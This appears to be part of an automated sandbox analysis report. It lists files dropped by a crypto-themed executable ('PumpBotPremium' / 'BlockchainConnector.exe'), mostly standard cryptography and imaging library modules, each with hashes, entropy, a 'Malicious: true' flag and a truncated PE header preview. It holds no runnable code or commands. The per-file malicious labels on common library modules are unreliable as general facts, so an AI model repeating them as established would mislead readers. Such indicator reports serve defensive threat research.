SSDEEP:	192:wJBjJPqZkEPYinXKccxrEWx4xLquhS3WQ67EIfD4d1ccqgwYUMvEW:iURwin7mrEYCLEGd7/fDawgwYUMvE
MD5:	DD3143D155A6D8A1C9F12CAE6E86484A
SHA1:	271FA34F16F727A73D552B04BDE8BDA8786A81F7
SHA-256:	90ED3206CA3D7248B5152B500A9D48BD55E1D178AED26214CE351090342260D1
SHA-512:	9DAEF75B99996F1C9A22E7C2339259AE955716DD5CC3ECC1D46BA8E28289843BF32AD0E498EF5969F35B1580C6B3434859B6CB940A0857D5C3598979686646EB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.eX.p...p...p.......p..A....p..E....p...p..&p..A....p..A....p..A....p.......p.......p.......p.......p..Rich.p..................PE..d....Ded.........." ...". ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.737934511632203
Encrypted:	false
SSDEEP:	192:8F/1nb2eqCQtkrKnlPI12D00acqgYvEn:W2P6KlPe2DIgYvEn
MD5:	FF2C1C4A7AE46C12EB3963F508DAD30F
SHA1:	4D759C143F78A4FE1576238587230ACDF68D9C8C
SHA-256:	73CF4155DF136DB24C2240E8DB0C76BEDCBB721E910558512D6008ADAF7EED50
SHA-512:	453EF9EED028AE172D4B76B25279AD56F59291BE19EB918DE40DB703EC31CDDF60DCE2E40003DFD1EA20EC37E03DF9EF049F0A004486CC23DB8C5A6B6A860E7B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	4.896113420654944
Encrypted:	false
SSDEEP:	192:kzRgPfqLlvIOP3bdS2hkPUDkjoCM/vPXcqgzQkvEmO:kUYgAdDkUDlCWpgzQkvE
MD5:	FE489576D8950611C13E6CD1D682BC3D
SHA1:	2411D99230EF47D9E2E10E97BDEA9C08A74F19AF
SHA-256:	BB79A502ECA26D3418B49A47050FB4015FDB24BEE97CE56CDD070D0FCEB96CCD
SHA-512:	0F605A1331624D3E99CFDC04B60948308E834AA784C5B7169986EEFBCE4791FAA148325C1F1A09624C1A1340E0E8CF82647780FFE7B3E201FDC2B60BCFD05E09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B................;.....I.......M...........!...I.......I.......I......................W............Rich....................PE..d....Ded.........." ..."..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.296941042514949
Encrypted:	false
SSDEEP:	192:dJ1gSPqgKkwv0i8NSixSK57NEEE/qexcEtDrnDjRcqgUF6+6vEX:dE1si8NSixS0CqebtDfrgUUjvE
MD5:	A33AC93007AB673CB2780074D30F03BD
SHA1:	B79FCF833634E6802A92359D38FBDCF6D49D42B0
SHA-256:	4452CF380A07919B87F39BC60768BCC4187B6910B24869DBD066F2149E04DE47
SHA-512:	5D8BDCA2432CDC5A76A3115AF938CC76CF1F376B070A7FD1BCBF58A7848D4F56604C5C14036012027C33CC45F71D5430B5ABBFBB2D4ADAF5C115DDBD1603AB86
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.F...(...(...(.......(.I.)...(.M.)...(...)...(.I.-...(.I.,...(.I.+...(.. ...(..(...(......(..*...(.Rich..(.........................PE..d....Ded.........." ..."..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.58491776551014
Encrypted:	false
SSDEEP:	96:zK0KVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EpmFWLOXDwoPPj16XkcX6gbW6z:z2VddiTHThQTctEEI4qXD/1CkcqgbW6
MD5:	821AAA9A74B4CCB1F75BD38B13B76566
SHA1:	907C8EE16F3A0C6E44DF120460A7C675EB36F1DD
SHA-256:	614B4F9A02D0191C3994205AC2C58571C0AF9B71853BE47FCF3CB3F9BC1D7F54
SHA-512:	9D2EF8F1A2D3A7374FF0CDB38D4A93B06D1DB4219BAE06D57A075EE3DFF5F7D6F890084DD51A972AC7572008F73FDE7F5152CE5844D1A19569E5A9A439C4532B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6)..WG.WG.WG./..WG..+F.WG../F.WG.WF.WG..+B.WG..+C.WG..+D.WG.R+O.WG.R+G.WG.R+..WG.R+E.WG.Rich.WG.........PE..d....Ded.........." ..."............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_eksblowfish.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	6.13818726721959
Encrypted:	false
SSDEEP:	384:IU/5cRUtPMbNv37t6KjjNrDF6pJgLa0Mp8Qk0gYP2lcCM:hKR8EbxwKflDFQgLa1kzP
MD5:	5076E232DD9A710EF253FCA53AF636B9
SHA1:	3D15B947387FEC1ADF10EC5A3CD643C070439332
SHA-256:	7BBCD258404E3458DE31AB3664AAF642F19864D3E0A82B028DC79771B4F16EA6
SHA-512:	78AA9D0BB15F27C55CDF55B305A9ADE39BCBD4BD6EF6D833E9768C58142495BA358D6E1F51E2979C1895D7C0AF2EA9B880202F53C75203DFEFCA40D21E0B1DDC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ...".(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.344975505079875
Encrypted:	false
SSDEEP:	384:UzPHdP3Mj7Be/yB/MsB3yRcb+IqcOYoQViCBD81g6Vf4A:UPcnB8KEsB3ocb+pcOYLMCBDx
MD5:	8C61F14B911B5D61D91875045E515142
SHA1:	D0A5A59E3C6614BF93501F8F90B36845CC27BB51
SHA-256:	87B882B6AF0036523AA919CB6D34F7192A5F590756D73A27D057791BF9D784D6
SHA-512:	473686522567DADAA867434799E2AF9ADE16BDA2405C1DA58BADA8B10A83F3090C19956DBB834FE9568C3501CAA4267D5EF5B71C461F73E0CDBFFD214E0A1BB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.%Y.pK..pK..pK......pK.A.J..pK.E.J..pK..pJ.(pK.A.N..pK.A.O..pK.A.H..pK...C..pK...K..pK......pK...I..pK.Rich.pK.................PE..d....Ded.........." ...".(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.732524211136862
Encrypted:	false
SSDEEP:	192:sF/1nb2eqCQtkgU7L9D0V70fcqgYvEJPb:m2P6L9DAAxgYvEJj
MD5:	619FB21DBEAF66BF7D1B61F6EB94B8C5
SHA1:	7DD87080B4ED0CBA070BB039D1BDEB0A07769047
SHA-256:	A2AFE994F8F2E847951E40485299E88718235FBEFB17FCCCA7ACE54CC6444C46
SHA-512:	EE3DBD00D6529FCFCD623227973EA248AC93F9095430B9DC4E3257B6DC002B614D7CE4F3DAAB3E02EF675502AFDBE28862C14E30632E3C715C434440615C4DD4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.17157470367637
Encrypted:	false
SSDEEP:	192:pF/1nb2eqCQt7fSxp/CJPvADQRntxSOvbcqgEvcM+:12PNKxZWPIDmxVlgEvL
MD5:	CEA18EB87E54403AF3F92F8D6DBDD6E8
SHA1:	F1901A397EDD9C4901801E8533C5350C7A3A8513
SHA-256:	7FE364ADD28266C8211457896D2517FDB0EE9EFC8CB65E716847965B3E9D789F
SHA-512:	74A3C94D8C4070B66258A5B847D9CED705F81673DD12316604E392C9D21AE6890E3720CA810B38E140650397C6FF05FD2FA0FF2D136FC5579570520FFDC1DBAC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."..... ......P.....................................................`.........................................09.......9..d....`.......P..@............p..,....3...............................2..@............0...............................text...8........................... ..`.rdata..4....0......................@..@.data...8....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.463458228413267
Encrypted:	false
SSDEEP:	192:UIyZ9WfqP7M93g8UdsoS1hhiBvzcuiDSjeoGmDZfRBP0rcqgjPrvE:UqA0gHdzS1MwuiDSyoGmDxr89gjPrvE
MD5:	9ADC256C4384EE1FE8C0AD5C5E44CD95
SHA1:	C5FC6E7AE0DFA5CF87833B23CD0294E9AE1F5BCA
SHA-256:	77EE1E140414615113EABB5FC43DBBA69DAEE5951B7E27E387CA295B0C5F651D
SHA-512:	4CB0905F0196B34AA66AC6FF191BD4705146A3E00DCD8B3F674740D29404C22B61F3C75B6FFB1FD5FDB044320C89A2F3EF224F1F1AA35342FF3DC5F701642B76
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.%Y.pK..pK..pK......pK.A.J..pK.E.J..pK..pJ.(pK.A.N..pK.A.O..pK.A.H..pK...C..pK...K..pK......pK...I..pK.Rich.pK.................PE..d....Ded.........." ...". ..........P.....................................................`..........................................8.......9..d....`.......P..X............p..,....3...............................1..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.681553876702266
Encrypted:	false
SSDEEP:	384:UzPHdP3MjeQTh+QAZUUw8lMF6DW1tgj+kf4:EPcKQT3iw8lfDsej+
MD5:	5E6FEF0FF0C688DB13ED2777849E8E87
SHA1:	3E739107B1B5FF8F1FFAAC2EDE75B71D4EBD128F
SHA-256:	E88A0347F9969991756815DFF0AF940F00E966BC7875AA4763A2C80516F7E4ED
SHA-512:	B97D4AA0AE76F528E643180ED300F1A50EAFE8B82C27212A95CE380BCA85F9CE1FF1AC1190173D56776FD663F649817514D6501CE80518F526159398DAA6F55C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.%Y.pK..pK..pK......pK.A.J..pK.E.J..pK..pJ.(pK.A.N..pK.A.O..pK.A.H..pK...C..pK...K..pK......pK...I..pK.Rich.pK.................PE..d....Ded.........." ..."...........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text....)......................... ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.90271944005012
Encrypted:	false
SSDEEP:	384:U1ljwG2JaQaqvYHp5RYcARQOj4MSTjqgPm4DwxregjxojS:AjwLJbZYtswvbDwxr7jUS
MD5:	6ABDCD64FACE45EFB50A3F2D6D792B93
SHA1:	038DBD53932C4A539C69DB54707B56E4779F0EEF
SHA-256:	1031EA4C1FD2F673089052986629B6F554E5B34582B2F38E134FD64876D9CE0F
SHA-512:	6EBE3572938734D0FA9E4EC5ABDB7F63D17F28BA7E94F1FE40926BE93668D1A542FFC963F9A49C5F020720CAAD0852579FED6C9C6D0AB71B682E27245ADC916C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.%Y.pK..pK..pK......pK.A.J..pK.E.J..pK..pJ.(pK.A.N..pK.A.O..pK.A.H..pK...C..pK...K..pK......pK...I..pK.Rich.pK.................PE..d....Ded.........." ...".6... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text...h5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..,............R..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.019867964622382
Encrypted:	false
SSDEEP:	192:HRF/1nb2eqCQtkbsAT2fixSrdYDtHymjcqgQvEW:Hd2P6bsK4H+D4wgQvEW
MD5:	64AB6E5428B213615E493D052474968F
SHA1:	3564F6F743A9EBC2CA9B656BB9D9F0C4D7A8DEDE
SHA-256:	6BE340AFF563BEE5F905C66734306729E8A241F356B4B053049AAE71A7326607
SHA-512:	FFE06E5D661C66D2716E99F97FDFDBF49E38750AD9E7A3D9A35DDEE12B592F327878DC9FDD002A21F9D04F7CE6FEBF945F0CB4219211B5173AA4A675FF721B74
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.&...H...H...H.......H.I.I...H.M.I...H...I.#.H.I.M...H.I.L...H.I.K...H..@...H..H...H......H..J...H.Rich..H.................PE..d....Ded.........." ..."............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.015378888018285
Encrypted:	false
SSDEEP:	192:IF/1nb2eqCQtks0iiNqdF4mtPjD0wA5LPYcqgYvEL2x:i2P6fFA/4GjD4cgYvEL2x
MD5:	287B0A3E9E9E239AFB9DFDCC091FF9D1
SHA1:	3358321AB2D11D40DE5935CF037AC8F5B6D36743
SHA-256:	A66196465C839EC6EB287615942D40F0088DFEB67EE88DDBCE3ED955829AE865
SHA-512:	FE1CBEC71296B1E880CFB3F2D17BF3325FCFBCAC070FDCD7EE765086AC31C563E75BEB8C6E1051192DDAE91DE34B83CC4CBF38757FB9789D8E015889D5494E48
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.....................@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.795317235666895
Encrypted:	false
SSDEEP:	192:kJkCffqPSTMeAk4OeR64ADp5i6RcqgO5vE:kXZMcPeR64ADu63gO5vE
MD5:	ACD58F05EF429D4D85163B98B26A2307
SHA1:	CCDF4A294B2E05B5E16784BAE562BFDB474308A0
SHA-256:	BB2BE221531D66EC5E6EF026F5548749430A785FD1FA1C1BECB12375C0CA6D1D
SHA-512:	4CC272B161A7EA35E45274D2FB1358104F9BED5A7B460F1DC094C48AD834D94D779E73362C4E4CA3F3B7FEAE4DA9812B5CD5F5EDF7683668043A7C62B853A0D8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B................;.....I.......M...........!...I.......I.......I......................W............Rich....................PE..d....Ded.........." ..."............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.7372077697895945
Encrypted:	false
SSDEEP:	192:zWVddiTHThQTctEEaEDKDvMRWJcqgbW6:SMdsc+EaEDKDvCWvgbW
MD5:	1831CB26FD8EE2B0AB0496F80272FC04
SHA1:	BC8E78CC005859F7272C3615A3774BA7D687F0F4
SHA-256:	D830D77669527129BF3D10929AAD1CC9EE5E44A9594E3FC651D3B5BC01C42C44
SHA-512:	DF51D636A277C8AD83C90AE99A824F77C441DA5C7B08A11C3D8752CD3661096EBF327008951CA97B4BAF9632B2CA16DF34A9F3E43BF837C8556BCB3C304BB2CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6)..WG.WG.WG./..WG..+F.WG../F.WG.WF.WG..+B.WG..+C.WG..+D.WG.R+O.WG.R+G.WG.R+..WG.R+E.WG.Rich.WG.........PE..d....Ded.........." ..."............P........................................p............`..........................................'..\|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.693475725745118
Encrypted:	false
SSDEEP:	96:zuZVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EMz3DVWMot4BcX6gbW6O:zUVddiTHThQTctEEO3DloKcqgbW6
MD5:	3AF448B8A7EF86D459D86F88A983EAEC
SHA1:	D852BE273FEA71D955EA6B6ED7E73FC192FB5491
SHA-256:	BF3A209EDA07338762B8B58C74965E75F1F0C03D3F389B0103CC2BF13ACFE69A
SHA-512:	BE8C0A9B1F14D73E1ADF50368293EFF04AD34BDA71DBF0B776FFD45B6BA58A2FA66089BB23728A5077AB630E68BF4D08AF2712C1D3FB7D79733EB06F2D0F6DBF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6)..WG.WG.WG./..WG..+F.WG../F.WG.WF.WG..+B.WG..+C.WG..+D.WG.R+O.WG.R+G.WG.R+..WG.R+E.WG.Rich.WG.........PE..d....Ded.........." ..."............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imaging.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2391552
Entropy (8bit):	6.459352782738398
Encrypted:	false
SSDEEP:	49152:R+QkpQIofdK7kmrpCQkU8UpjNuLrLrLrLu2fFFt:GKK7k+K
MD5:	C7C53CDE4D02ACE0BF9D777103160BD9
SHA1:	3E83388416A2D929E501F833F799D740B2C4963F
SHA-256:	F8BCBC54B58E2A224E67DF52C210B698CC3A7C49F8E63E58D3D253BCAF4BEFEE
SHA-512:	FED73A9C9A395E0C15F3179D24799F11213DFC8FF58249FEED30515244B3C099F5BB8E8220485740382122929B627959FB1DAC2911F9E0C2B8C1087E073E7828
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........V...8...8...8.......8.$.9...8.$....8.$.=...8.$.<...8.$.;...8._.9...8..9...8...9...8.B.<.m.8...8...8.B.0...8.B.8...8.B....8.B.:...8.Rich..8.................PE..d....).d.........." ...#.@...l......,.........................................$...........`......................................... .#.`.....#.......$.......#...............$.x...@.!.......................!.(.....!.@............P...............................text...H>.......@.................. ..`.rdata.......P.......D..............@..@.data...h.... #..^....#.............@....pdata........#......r#.............@..@.rsrc.........$......f$.............@..@.reloc..x.....$......h$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingcms.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	256512
Entropy (8bit):	6.274165341047041
Encrypted:	false
SSDEEP:	6144:GWPDrbQBTAcY355skl/RI7OMhkAXLg9uP1+74/LgHmPr9qvZqhLanLTLzLfqeqw6:GWbrboTJcihhkAXLg9uP1+74/LgHmPry
MD5:	9C644FCDD0CBD1082C3AAD18F1F6E148
SHA1:	6707F841D3C678C66903BA18746113BC40DD97A9
SHA-256:	5D2A24D817C0AADB8CEC4E5A3175707986BD53BCB5339EC319BC0142CBBBFE5B
SHA-512:	F430121D52DFB13089ED6ABF40138C9E251BB2EFAE9CB1F368D647647D3AE6EDD83E8604099DB52A54278B0AB7B6B103622D3D171EF0C272E8BDA95C66CBC69F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Se.<...o...o...o.\|8o...o.x.n...o.x.n...o.x.n...o.x.n...o.q.n...o\\|.n...o...oy..o.y.n...o.y.n...o.yTo...o.y.n...oRich...o........................PE..d...h).d.........." ...#..... ......,........................................ ............`..........................................y..h....y..................t....................?..............................`>..@...............p............................text............................... ..`.rdata..n...........................@..@.data....>.......8...z..............@....pdata..t........0..................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingft.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1717248
Entropy (8bit):	6.767070135540314
